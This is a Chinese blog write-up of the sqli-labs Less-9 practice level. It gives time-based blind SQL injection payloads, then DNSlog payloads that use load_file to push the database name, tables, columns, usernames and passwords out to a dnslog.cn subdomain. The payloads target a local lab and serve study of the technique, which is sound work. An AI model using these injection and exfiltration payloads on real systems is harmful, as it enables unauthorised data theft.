sqli-labs less-9 Dnslog注入方法

最新推荐文章于 2024-05-23 09:35:21 发布
最新推荐文章于 2024-05-23 09:35:21 发布
阅读量2.1k 收藏 4
点赞数 3
分类专栏: 笔记 文章标签: web 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cuddlylm/article/details/123886711
版权

重新做sqli-labs的时候发现这题还有另一种做法,记录一下
之前的做法 报错注入加时间盲注
1.

http://127.0.0.1/sqli_labs/Less-9/?id=1

返回正确(you are in…)

http://127.0.0.1/sqli_labs/Less-9/?id=1'

仍然返回正确(you are in…)
看源码,虽然还是用的单引号的方式闭合,但是不知道为什么不报错,但这题必然是可以注入的
换用延时注入的方法试着判断一下能否注入

http://127.0.0.1/sqli_labs/Less-9/?id=1' and sleep(5)--+

网页加载了5秒,虽然还是有正确回显(you are in…),但显然是and前面的语句报错了,只是回显永远是you are in…
2.
这步应该到查字段了,但当使用order by的时候,此时无论如何都是回显you are in….所以无法使用order by进行判断。
由于我们下一步要查数据库名,而这题盲注无论如何回显都只会给you are in…
只要我们能够判断我们猜测的数据库名是否正确就行,所以这步直接查数据库名

http://127.0.0.1/sqli_labs/Less-9/?id=1' and if(length(database())=8,1,sleep(5));

通过返回时间进行判断,此时如果数据库长度为8,则可以较快返回。

http://127.0.0.1/sqli_labs/Less-9/?id=1' and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1))=109,1,sleep(5))--+

判断第五个数据库名的第一个字母ascii码值是否是109(m)
建议不要用hackbar发包,有时会出错
3.
后面的方法都和第八关里面时间盲注的方法相类似,这里就不再赘述了

dnslog注入

对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设备的防护,Dnslog盲注可以减少发送的请求,直接回显数据实现注入 使用DnsLog盲注仅限于windos环境。

因为它只有正常显示和不正常显示两种状态,不回显MySQL的报错信息。一般是使用盲注,但是它页面上提示的有“Use outfile…”,既然提示了,那么就说明它开了读写权限。
使用load_file函数可行
1.构造payload

?id=1' and load_file(concat('\\\\',(select database()),'.6sx2l3.dnslog.cn\\abc'))--+

解释一下这个payload
concat()的作用就是将字符串连接在一起
\\其实是转义的意思,使用后就会变成 \
\也是转义,这样就会变成一个
然后逗号隔开,(select database()) 就是一个子查询
这时候查询语句就会变成

select load_file(\库名.SubDomain\asb)

最后构造出来的注入语句就是

select load_file(concat(’\\’,(select database()),’.SubDomain\abc’))

get这个payload后回到dnslog platform就可以看到成功爆出了我们的数据库名
在这里插入图片描述

?id=1' and load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.snkmf2.dnslog.cn\\abc'))--+

然后依次改变limit后面的值爆出表名
在这里插入图片描述

?id=1' and load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='users' limit 0,1),'.snkmf2.dnslog.cn\\abc'))--+

爆字段名
在这里插入图片描述

?id=1' and load_file(concat('\\\\',(select username from users limit 0,1),'.snkmf2.dnslog.cn\\abc'))--+     #获取表中的数据
?id=1' and load_file(concat('\\\\',(select password from users limit 0,1),'.snkmf2.dnslog.cn\\abc'))--+     #获取表中的数据

在这里插入图片描述到此dnslog注入的步骤就完成了

cyphersec
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DNSLog-Platform-Golang:DNSLOG平台golang一键启动版
04-02
DNSLog-平台-Golang 相信DNSLog平台已经是安全从业者的标配。而公开的DNSLOG平台域名早已进入流量监控设备的规则库。同时也有重大问题值得关注。于是撸了(凑了)一个一键建造Dnslog平台的golang版本。可以使用其一键构造自己的Dnslog平台。由于是作者的第一个golang程序,难免会有一些小问题。不过他真的是一键! 部署 克隆或者下载本仓库到你的服务器上 不多说。 决定是否开放公网访问? 倒数第几行中的http.ListenAndServe("localhost:8000", nil) ,这样写的话只能通过本地主机进行访问,墙裂建议不要修改,而后通过中间件反向代理后对外开放,方便做访问控制,日志管理等。如果想直接对外开放的话可以修改为: http.ListenAndServe(":8000", nil) 域名准备 做好NS指向即可。不会检查请看后文 尝试运行 ~~
SQL-labs练习记录(11~15)【仿真登录,报错注入,闭合探测,dnslog注入
bin789456的博客
08-15 204
Less11 到这里,题目终于与我们现实中见到的登录比较相似了,但是要知道这仅仅是形式不同(只是sql语句要再次选择一个密码框),其原理与之前的学习关联非常大。 首先输入单引号或错误语句进行探测 有错误提示,说明这是错误注入,那么思路大体就是第一关的思路。 使用一个真语句进行探测。 1' or 1=1 -- 登录成功。 这里有几个点要说明一下: 1.首先这里不再是get型,换成了post,这很容易理解,这也就表明后续我们写脚本要使用post方法了。 2.在登录框的注释不再是get请求会被url编码,所以
sql注入;基于时间盲注;sqli-labs/less-9;
xiaochenhang的博客
08-18 301
1、搭建好环境,连好数据库;这里看我这篇文章,可以找到网盘文件。利用burpsuite抓包,将数据长度设置为变量,进行匹配;由于大小写不敏感,所以通过ascll码转换后和数字比对得出。2、无真假,报错回显,通过时间延迟判断;6、这次只匹配小写数据库,既然大小写不敏感。if(判断函数,为真返回值,为假返回值)第二个参数为ascll中的0-127。limit0,1-->找第一张表;3、通过延迟函数判断是否有延迟。8、爆一下emails表的字段名。这里延迟6秒:成功,有时间盲注。9、爆一下字段id的数据。...
SQL注入——基于时间的盲注(sqli-labs less9)
yuan114012的博客
05-21 974
一.基于时间得盲注 适用场景:没有数据回显,条件正确与否结果一样 利用方式:构造判断条件,添加sleep,逐个猜测(盲猜) 1.所需语法与函数 IF表达式 IF( expr1 , expr2 , expr3 ) #expr1 的值为 TRUE,则返回值为 expr2 #expr1 的值为FALSE,则返回值为 expr3 expr1 的值为 TRUE,则返回值为 expr2 expr1 的值为FALSE,则返回值为 expr3 mysql> select if(1=1,1,.
dnslog带出——sqli-labs第8关
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-04 1684
得到一个随机的子域名 库名 http://172.16.11.54/sqli-labs/Less-8/?id=1' and load_file(concat("\\\\",database(),".uifm3e.dnslog.cn\\xxx.txt"))--+ 表名 http://172.16.11.54/sqli-labs/Less-8/?id=1' and load_file(concat("\\\\",(select group_concat(table_name SEPARATOR'-') f.
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs ————less -9
Fly_鹏程万里
05-11 1740
Less-9首先我们可以查看一下源代码:一方面:从标题中我们可以看到这是一个基于时间盲注的单引号注入另一方面:从之后的“print_r(mysql_error());”来看我们并不可以使用报错注入最后,我们可以看到可以通过' and 1=1 --+或者' or 1=1 --+来绕过既然如此,那么我就用延迟注入的方式来注入:猜解数据库:payload:http://192.168.11.136/sq...
sqli-labs less9详解
Brilliant_orange的博客
11-10 1385
【写在前面:建议:如果对SQL注入SQL语句不熟悉的可以先看看如果看懂了这篇,这题就当应用了】
DNSlog平台详解
不忘初心,护天下安全!
09-21 4183
DNSLOG 是解析日志, DNS分为三级域名, 域名不区分大小写, 所以利用解析的日志把攻击者需要的值带出, 称为数据外带,原理上只要能进行DNS请求的函数都可能存在DNSlog注入,如命令执行、SSRF、XXE、sql盲注、xxs盲打等。在windows和linux因具体shell指令不同,因此需要分情况讨论,但思路一致,通过在dnslog平台的查询中,插入主机指令执行后的结果,将结果数据外带。以靶场 pikachu 的时间盲注为例,输入qianli' and sleep(5)#,耗时5秒。
SQL注入之布尔型盲注
技术超强的网络安全平台
12-02 1498
SQL注入之布尔型盲注 1.布尔型盲注 布尔型盲注应用于无数据回显,且WEB页面无报错信息的情况,此时不能通过报错型注入方法来爆出数据,布尔型盲注的WEB页面只有两种回显结果,正确的页面以及错误的页面,且错误的页面无报错提示语句,正确的页面不能输出数据。 2.函数 盲注,其注入就是通过函数的执行结果来猜测数据 Leng...
搭建dnslogweblog平台
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
09-26 6267
文章目录a、前期准备b、搭建 渗透测试的时候,对于命令注入、反序列化等无回显漏洞,dnslog或者weblog是一个必不可少的平台。 不想搭建,可使用免费版:http://dnslog.cn/,不过有时效限制 下面是我的搭建过程,由于使用了别人做好的docker,所以总体搭建过程较为简单。 a、前期准备 一个公网服务器,一个域名(有的教程说要两个域名,一个足够了),我这里买的都是最低端的,一年总共也就一百来块,足够用了。 下面是我的域名配置: 配置A记录,子域名ns1,解析到 7.7.7.7(你买的公网i
【Less-9】基于SQLI的SQL时间盲注
未名编程
07-17 661
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 【实验目的】【实验环境】【实验原理】【实验步骤】第一步 登录SQLI-Labs平台第二步 登录Kali平台,启动Firefox浏览器访问SQLI-Labs的less-9第三步 判断注入点与注入类型第四步 获取数据库名的长度第五步 探测数据库其他信息【思考与总结】 【实验目的】 通过本实验理解SQL时间盲注漏洞的定义方法,掌握基于SQL时间盲注的手工注入方法,熟悉SQL时间盲注存在的原因,掌握SQL时间盲注的防护方法。 .
探秘DNSLog管理利器:DNSLog-Platform-Golang
最新发布
gitblog_00022的博客
05-23 273
探秘DNSLog管理利器:DNSLog-Platform-Golang 项目地址:https://gitcode.com/yumusb/DNSLog-Platform-Golang 在网络安全领域,DNSLog是不可或缺的工具,它帮助我们捕获和分析DNS查询信息,揭示潜在的安全威胁。而【DNSLog-Platform-Golang】是一款由Golang编写的开源项目,旨在提供一键式部署个人化DNS...
sqli-labs-less-9 延时注入方法
yzcn
10-31 585
Less-9 延时注入 less-9与less-8类似,延时注入详解可见less-8 判断注入点: http://127.0.0.1/sqli-labs-master/Less-9/?id=1’ 显示正常,无报错 http://127.0.0.1/sqli-labs-master/Less-9/?id=1’ and 1=2 --+ 显示正常 http://127.0.0.1/sqli-labs-master/Less-9/?id=1’ and sleep(5) --+ 页面刷新5s,判断存在延时注入
sql盲注进阶篇-dnslog盲注
十五年游戏主程转渗透之路
03-31 3541
dnslog注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值